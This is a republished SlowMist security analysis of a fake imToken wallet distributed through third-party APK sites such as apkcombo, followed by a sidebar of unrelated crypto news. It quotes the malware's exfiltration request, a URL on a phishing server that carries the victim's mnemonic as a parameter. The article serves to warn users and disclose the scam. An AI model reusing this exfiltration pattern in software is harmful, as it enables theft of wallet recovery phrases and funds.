Cointime

Download App
iOS & Android

SlowMist: Investigation and Analysis of Third-party Sources of Fake Web3 Wallets

Background

Web3, which is powered by blockchain technology, is spearheading the next phase of the technological revolution, with an increasing number of individuals getting involved in this encryption wave. However, Web3 and Web2 are two distinct worlds, with the former being a dark forest that offers diverse opportunities and risks. In this regard, the wallet serves as the entryway and pass to the Web3 world.

As you explore and interact with various blockchain-related applications and websites in the Web3 world through your wallet, you’ll realize that each application on a public chain uses a wallet to “log in.” This differs from the traditional “login” method in Web2, where accounts between different applications are not interconnected. Conversely, in the Web3 world, all applications employ wallets uniformly for “log in” purposes. Furthermore, when you “connect” to a wallet, it’s not displayed as “Login with Wallet,” but instead as “Connect Wallet.” Essentially, the wallet is the sole means of accessing the Web3 world.

As the saying goes, “where there’s light, there’ll be a shadow.” In this scorching Web3 environment, wallets, as entry-level applications, have naturally become targets of the black and gray industry chain.

Due to various reasons, such as lack of support for Google Play on certain phones or network-related problems, many individuals opt to download Google Play apps from alternative sources, such as apkcombo, apkpure, and other third-party download sites. These sites often assert that their apps are downloaded from the Google Play mirror, but their actual security remains questionable.

Website Analysis

Given the numerous downloading options, let’s take a look at apkcombo as an example. Apkcombo is a third-party app market that claims to offer applications sourced mainly from other legitimate app stores. But is this really the case?

Let’s first look at the traffic volume of apkcombo:

According to the data analytics website, SimilarWeb, apkcombo website ranks:

Global Rank: 1,809Country Rank: 7,370Category Rank: 168

We can see that its influence and traffic are both very significant.

Apkcombo provides a default Chrome APK download plugin, which has over 100,000+ users:

So, returning to our focus on the wallet sector in the Web3 field, how secure are the wallet applications downloaded from these sources?

Let’s take the well-known imToken wallet as an example. Its legitimate download channel on Google Play is:

https://play.google.com/store/apps/details?id=im.token.app

Due to certain phones lacking Google Play support or network issues, numerous individuals prefer to download Google Play apps from sources other than the official platform.

The download path for the apkcombo mirror site is: https://apkcombo.com/downloader/#package=im.token.app

The image above reveals that apkcombo offers version 24.9.11, which imToken has verified to be a non-existent version. This confirmation solidifies the fact that this is currently the most widespread fraudulent version of the imToken wallet available.

As of the writing of this article, the imToken wallet’s latest version is 2.11.3, which has a comparatively high version number, potentially utilized to mask itself as the most up-to-date version.

The image below illustrates that this fraudulent wallet version on apkcombo has a substantial download count, which is most probably sourced from Google Play’s download information. In the interest of security, we deem it crucial to expose the origin of this malevolent app to discourage further downloads of this counterfeit wallet.

Meanwhile, we found similar download sites such as: uptodown. Download link: https://imtoken.br.uptodown.com/android

We discovered that on uptodown, anyone can publish apps with minimal cost, therefore making phishing attacks more accessible:

Wallet Analysis

As we have previously examined various cases of counterfeit wallets, including the one reported in “SlowMist: Fake wallet app has stolen millions of dollars from over 10,000 users” published on November 24, 2021, we will refrain from delving into further detail here.

Our analysis will specifically focus on the counterfeit wallet offered by apkcombo, version 24.9.11. During the process of creating or importing a wallet mnemonic on the startup interface, the fake wallet will transmit the mnemonic and other sensitive data to the phishing website’s server, as exemplified in the following image:

According to the reverse APK code and analysis of traffic packets, the method used to send the mnemonic is: https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助记词>

As seen in the image below, the earliest “api.funnel.rocks” certificate appeared on June 3, 2022, which is likely when the attack began:

As the saying goes, a picture is worth a thousand words, so here is a flowchart we have created:

Conclusion

Currently, this type of scam is not only active but also expanding in scope, with new victims falling prey to it every day. As users are the weakest link in the security system, they must remain vigilant, enhance their security and risk awareness, and always use official download channels and verify information from multiple sources when using wallets and exchanges. If you have downloaded a wallet from the above-mentioned mirror sites, transfer your assets immediately, uninstall the software, and verify the information through official verification channels if necessary.

To guarantee the safety of your wallet, it is crucial to exclusively use the official websites of renowned wallet applications.

  • imToken:https://token.im/
  • TokenPocket:https://www.tokenpocket.pro/
  • TronLink:https://www.tronlink.org/
  • Bitpie:https://bitpie.com/
  • MetaMask:https://metamask.io/
  • Trust Wallet:https://trustwallet.com/

Continue following the SlowMist Security Team for more Web3 security risk analysis and alerts.

Thanks to @imTokenOfficial for providing official verifiable support during the traceability process.

To protect confidentiality and privacy, this article provides only a brief overview of the issue. SlowMist advises users to increase their understanding of security, improve their capacity to recognize phishing attacks, and refrain from becoming victims of such schemes. To gain more knowledge about security, individuals can refer to the “Blockchain dark forest selfguard handbook” published by SlowMist.

Read more: https://slowmist.medium.com/slowmist-investigation-and-analysis-of-third-party-sources-of-fake-web3-wallets-dfaaf820b804

Comments

All Comments

Recommended for you

  • Putin: Russia "supports" Harris, calls her smile "contagious"

    According to foreign media such as TASS and Russia's Sputnik News, Jinse Finance reported that on the afternoon of September 5th local time, Russian President Putin said at the plenary session of the Eastern Economic Forum 2024 that Russia will "support" the US Democratic Party presidential candidate and vice president Harris as recommended by the US President Biden in the upcoming US presidential election. When asked how he viewed the 2024 US election, Putin said it was the choice of the American people. The new US president will be elected by the American people, and Russia will respect the choice of the American people. Putin also said that just as Biden suggested his supporters to support Harris, "we will do the same, we will support her." The report said that Putin also joked that Harris' laughter is "expressive and infectious," which shows that "she is doing everything well." He added that this may mean that she will avoid further sanctions against Russia.

  • An ETH whale repurchased 5,153 ETH with 12.23 million USDT 20 minutes ago

    A certain high-frequency trading ETH whale monitored by on-chain analyst Yu Jin bought 5,153 ETH with 12.23 million USDT 20 minutes ago.

  • CFTC: Uniswap Labs has actively cooperated with the investigation and only needs to pay a fine of US$175,000

    The CFTC has filed a lawsuit against Uniswap Labs and reached a settlement. It was found that Uniswap Labs illegally provided leveraged or margined retail commodity transactions of digital assets through a decentralized digital asset trading protocol. Uniswap Labs was required to pay a civil penalty of $175,000 and cease violations of the Commodity Exchange Act (CEA). The CFTC acknowledged that Uniswap Labs actively cooperated with law enforcement agencies in the investigation and reduced the civil penalty.

  • Federal Reserve Beige Book: Respondents generally expect economic activity to remain stable or improve

    The Federal Reserve's Beige Book pointed out that economic activity in three regions has slightly increased, while the number of regions reporting flat or declining economic activity has increased from five in the previous quarter to nine in this quarter. Overall employment levels remain stable, although some reports indicate that companies are only filling necessary positions, reducing working hours and shifts, or reducing overall employment levels through natural attrition. However, reports of layoffs are still rare. Generally speaking, wage growth is moderate, and the growth rate of labor input costs and sales prices ranges from slight to moderate. Consumer spending has declined in most regions, while in the previous reporting period, consumer spending remained stable overall.

  • Puffpaw Completes $6 Million Seed Round with Lemniscap Ventures as Participant

    Puffpaw has announced the completion of a $6 million seed round of financing, with participation from Lemniscap Ventures. The Puffpaw project plans to launch a blockchain-enabled electronic cigarette aimed at helping users reduce nicotine intake through token incentives. The project encourages users to quit smoking by recording their smoking habits and rewarding them with tokens. Puffpaw's token economics aims to cover 30% of the cost of users' first month of using their product and provide social rewards. The project also considers possible system abuse, but the issue of users potentially reporting smoking habits dishonestly is not yet clear.

  • Affected by Ethervista and others, Ethereum Gas temporarily rose to 33gwei

    According to Etherscan, due to the influence of contracts such as Ethervista, Ethereum Gas has temporarily risen to 33gwei, with the top three being EthervistaRouter, UniswapRouter, and BananaGun.

  • The probability of the Fed cutting interest rates by 25 basis points in September is 55%.

    The probability of the Federal Reserve cutting interest rates by 25 basis points in September is 55.0%, while the probability of a 50 basis point cut is 45.0%. The probability of the Federal Reserve cutting interest rates by a cumulative 50 basis points by November is 32.1%, by 75 basis points is 49.2%, and by 100 basis points is 18.8%.

  • Nvidia: No subpoena received from the US Department of Justice

    Nvidia (NVDA.O) stated that it has not received a subpoena from the US Department of Justice.

  • US SEC again postpones decision on environmentally friendly Bitcoin ETF listing application

    The US Securities and Exchange Commission (SEC) has once again postponed its final decision on the New York Stock Exchange (NYSE) Arca's application for a carbon offset Bitcoin ETF. According to a document dated September 4th, the decision has been extended to November 21st. The ETF aims to provide a Bitcoin investment exposure in an environmentally friendly way by offsetting carbon emissions, tracking an investment portfolio composed of 80% Bitcoin and 20% carbon credit futures. Tidal Investments submitted the fund registration application in December 2023, while NYSE Arca submitted the initial application in March. Concerns have been raised about the environmental impact of Bitcoin mining, with the International Monetary Fund (IMF) reporting that cryptocurrency mining accounts for 1% of global greenhouse gas emissions. The delay in this decision also includes the postponement of approval for the Nasdaq One-Stop Cryptocurrency Investment Portfolio ETF.

  • Japanese regulator calls for lower cryptocurrency tax rates by 2025

    On September 4th, it was announced that Japan's financial regulatory agency has released a comprehensive tax reform plan for the fiscal year 2025, which includes regulations on cryptocurrency to lower its tax rate.